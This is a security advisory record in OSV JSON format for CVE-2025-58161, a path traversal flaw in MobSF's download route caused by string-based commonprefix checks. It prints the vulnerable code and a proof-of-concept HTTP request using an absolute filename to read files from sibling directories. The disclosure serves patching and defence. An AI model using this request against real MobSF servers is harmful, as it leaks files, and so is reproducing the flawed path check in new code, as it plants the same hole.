{"id":"PYSEC-2026-1672","summary":"MobSF Path Traversal in GET /download/\u003cfilename\u003e using absolute filenames","details":"### Summary\nThe GET /download/\u003cfilename\u003e route uses string path verification via os.path.commonprefix, which allows an authenticated user to download files outside the DWD_DIR download directory from \"neighboring\" directories whose absolute paths begin with the same prefix as DWD_DIR (e.g., .../downloads_bak, .../downloads.old). This is a Directory Traversal (escape) leading to a data leak.\n\n### Details\n```\ndef is_safe_path(safe_root, check_path):\n    safe_root  = os.path.realpath(os.path.normpath(safe_root))\n    check_path = os.path.realpath(os.path.normpath(check_path))\n    return os.path.commonprefix([check_path, safe_root]) == safe_root\n```\ncommonprefix compares raw strings, not path components. For:\n```\nsafe_root  = /home/mobsf/.MobSF/downloads\ncheck_path = /home/mobsf/.MobSF/downloads_bak/test.txt\n```\nthe function returns True, incorrectly treating downloads_bak as inside downloads.\nDownload handler:\n```\n# MobSF/views/home.py\n@login_required\ndef download(request):\n    root = settings.DWD_DIR\n    filename = request.path.replace('/download/', '', 1)\n    dwd_file = Path(root) / filename  # absolute 'filename' ignores 'root'\n    if '../' in filename or not is_safe_path(root, dwd_file):\n        return HttpResponseForbidden(...)\n    ext = dwd_file.suffix\n    if ext in settings.ALLOWED_EXTENSIONS and dwd_file.is_file():\n        return file_download(dwd_file, ...)\n```\nIf the client supplies an absolute path in filename (starts with / or C:/), Path(root) / filename resolves to that absolute path; the flawed is_safe_path then accepts any sibling directory whose absolute path shares the same string prefix. The ../ check does not catch this.\n\nWhich file types are retrievable: Whatever is allowed by settings.ALLOWED_EXTENSIONS\n\n### PoC\nPrereqs: authenticated user; standard install.\nAssume:\n```\nsettings.DWD_DIR = /home/mobsf/.MobSF/downloads\n```\nPrepare a sibling directory with the same string prefix and a test file:\n```\nmkdir -p /home/mobsf/.MobSF/downloads_bak\necho \"test\" \u003e /home/mobsf/.MobSF/downloads_bak/test.txt\n```\nAs an authenticated user, request (note the leading / in the filename and the double/triple slash after /download/ to preserve it):\n```\nGET /download///home/mobsf/.MobSF/downloads_bak/test.txt HTTP/1.1\nHost: \u003cHOST\u003e\nCookie: sessionid=\u003cYOUR_SESSION\u003e\n```\nOther working sibling directory names (if present):\n```\n…/downloads.old/...\n…/downloads_backup/...\n…/downloads1/...\n…/downloads-archive/...\n…/downloads 2024/... (URL-encoded space: downloads%202024)\n```\n### Impact\nAny authenticated user can download files (with allowed extensions) from sibling directories whose absolute paths start with the same string prefix as DWD_DIR.","aliases":["CVE-2025-58161","GHSA-ccc3-fvfx-mw3v"],"modified":"2026-07-07T17:47:05.862226919Z","published":"2026-07-07T16:03:03.065548Z","references":[{"type":"WEB","url":"https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-ccc3-fvfx-mw3v"},{"type":"WEB","url":"https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/7f3bc086c028c1b50889cab8a15f7b59b7abdaf9"},{"type":"PACKAGE","url":"https://github.com/MobSF/Mobile-Security-Framework-MobSF"},{"type":"WEB","url":"https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.1"},{"type":"PACKAGE","url":"https://pypi.org/project/mobsf"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-ccc3-fvfx-mw3v"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58161"}],"affected":[{"package":{"name":"mobsf","ecosystem":"PyPI","purl":"pkg:pypi/mobsf"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.4.1"}]}],"versions":["3.2.6","3.2.7","3.2.8","3.2.9","3.3.3","3.3.5","3.4.0","3.4.3","3.4.6","3.5.0","3.6.0","3.6.9","3.7.6","3.9.7","4.1.3","4.3.0","4.3.2","4.4.0"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/mobsf/PYSEC-2026-1672.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"}]}